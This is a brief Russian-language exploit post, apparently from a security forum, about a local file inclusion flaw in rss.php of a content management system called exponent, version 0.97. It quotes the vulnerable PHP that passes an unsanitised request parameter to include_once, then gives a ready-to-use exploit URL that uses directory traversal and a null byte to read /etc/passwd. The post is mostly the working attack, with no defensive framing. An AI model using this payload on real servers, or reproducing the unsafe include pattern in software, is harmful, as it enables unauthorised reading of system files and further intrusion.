Version: 0.97 LFI magic_quotes_gpc = Off или "особые обстоятельства" PHP: //file rss.php if (isset($_REQUEST['module'])) { $module = $_REQUEST['module']; ..... if (isset($module)) { //get the RSS Items from the module include_once('modules/'.$module.'/class.php'); Exploit: Code: http://exponent/rss.php?module=../../../../etc/passwd%00 зы насчет регстр глобалз я прогнал, это в другом месте.
